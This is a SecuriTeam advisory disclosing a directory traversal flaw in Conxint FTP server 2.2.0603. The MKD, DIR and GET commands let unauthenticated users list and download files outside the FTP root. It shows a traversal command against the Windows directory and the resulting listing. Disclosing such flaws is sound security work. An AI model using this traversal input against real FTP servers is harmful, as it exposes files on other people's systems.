[NT] Conxint FTP MKD DIR and GET Directory Transversal



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Conxint FTP MKD DIR and GET Directory Transversal
------------------------------------------------------------------------


SUMMARY

"Conxint FTP server provide FTP service on Windows 98/2000/2003/ME/XP
operation system. You can use it as a general FTP site server, or share
files with other users as a file server."

Conxint FTP v2.2.0603 and previous is vulnerable to Directory Transversals
via the MKD and DIR as well as GET commands.

DETAILS

Description:
Conxint FTP v2.2.0603 and previous is vulnerable to Directory Transversals
via the MKD and DIR as well as GET commands.
This improperly shows file listings of the host computer outside of the
FTP Root directory. As well as allows remote users or even Unathenticated
Anonymous uers to grab any file on the webserver.

220 Conxint ftp server ready!
ftp> dir \..\..\..\windows\
200 PORT Command successful.
125 Opening ASCII mode data connection for /bin/ls.
total 0
-rw-rw-r-- 1 root root 0 Aug 09 10:45 .tmp
drw-rw-r-- 1 root root 512 Oct 13 00:35 $hf_mig$
drw-rw-r-- 1 root root 512 Jun 24 03:02
$MSI31Uninstall_KB893803v2$
drw-rw-r-- 1 root root 512 Jun 25 03:17
$NtUninstallKB873339$
drw-rw-r-- 1 root root 512 Jun 25 03:22
$NtUninstallKB885835$
drw-rw-r-- 1 root root 512 Jun 25 03:21
$NtUninstallKB885836$
drw-rw-r-- 1 root root 512 Jun 25 03:09
$NtUninstallKB885884$
drw-rw-r-- 1 root root 512 Jun 25 03:09
$NtUninstallKB886185$
drw-rw-r-- 1 root root 512 Jun 25 03:16
$NtUninstallKB887742$
drw-rw-r-- 1 root root 512 Jun 25 03:16
$NtUninstallKB888113$
drw-rw-r-- 1 root root 512 Jun 25 03:10
$NtUninstallKB888302$
drw-rw-r-- 1 root root 512 Jun 25 03:12
$NtUninstallKB890046$
drw-rw-r-- 1 root root 512 Jun 25 03:01
$NtUninstallKB890859$
drw-rw-r-- 1 root root 512 Jun 25 03:14
$NtUninstallKB891781$
..... ETC


ADDITIONAL INFORMATION

The information has been provided by: <mailto:glinares.code at gmail.com>
Greg Linares.



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [NT] Cross Application Scripting in Trend Micros Antivirus Software
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The SecuriTeam alerts list - Free, Accurate, Independent. ... When the product alerts the user of a possible virus, it creates an HTML ...
    (Securiteam)
  • [NT] Microsoft Windows NTFS Improper Handler Closing
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... from a system shutdown, uninitialized data may be visible in files from ...
    (Securiteam)
  • [NEWS] Gecko Engine Multiple Vendor DoS (History.dat)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Basically firefox logs all kinda of URL data in it's history.dat file, ... it will instantly crash due to a buffer overflow -- this will ...
    (Securiteam)
  • [UNIX] PAJAX XSS and File Inclusion
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... PAJAX XSS and File Inclusion ... cross site scripting and file inclusion attacks by using the PAJAX ...
    (Securiteam)
  • [EXPL] QK SMTP DoS (Exploit)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... QK SMTP DoS ... static char overflow; ...
    (Securiteam)